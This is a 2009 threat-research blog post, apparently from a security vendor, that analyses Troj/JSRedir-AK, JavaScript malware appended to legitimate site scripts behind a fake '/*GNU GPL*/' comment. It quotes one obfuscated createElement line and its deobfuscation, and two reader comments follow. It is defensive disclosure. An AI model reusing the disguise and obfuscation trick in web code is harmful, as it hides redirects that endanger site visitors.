GNU GPL malware?: Troj/JSRedir-AK
- Wednesday, December 23, 2009, 2:01
- Threat Research
Yesterday, one of our technology partners Yandex notified us of some new malware. They use Sophos to scan webpages for malicious content while they scan the Internet and often report new threats.
The malware in question, Troj/JSRedir-AK, is appended to legitimate JavaScript and tries to look legitimate by using a comment to fool web admins.
See the comment:
/*GNU GPL*/
in the picture below.
The code is obfuscated the line:
document.createElement(’s&!c&#^)r^#(!i)@p#&t&)&^’.replace(/\(|\)|&|@|\$|\^|\!|#/ig, ”))
deobfuscates to:
document.createElement(’script’)
The next few lines of code do the redirection to a webpage in Russia with the following legitimate strings in its URL:
google-com-ar
google.ch
google.com
mininova.org
cams.com
ip138-com
I suspect that this code is part of a larger hack and if you find this code on your website please send us samples of other recently modified files.
Please check my article about this issue:
http://justcoded.com/article/gumblar-family-virus-removal-tool/
Yeah…
My computer somehow picked it up too just recently. In fact I had some virus that managed to get onto my server with go daddy and corrupted all of my php files (blogs). I literally had to wipe my computers hard drive plus I had to remove all of the blogs off of my server. Then a few days later I start getting reports from people saying that my websites, (html code), are being quarantined by their spyware protection software on their computers and saying that my site poses a potential threat. Now I’m gonna have to completely wipe out my whole server and start over fresh.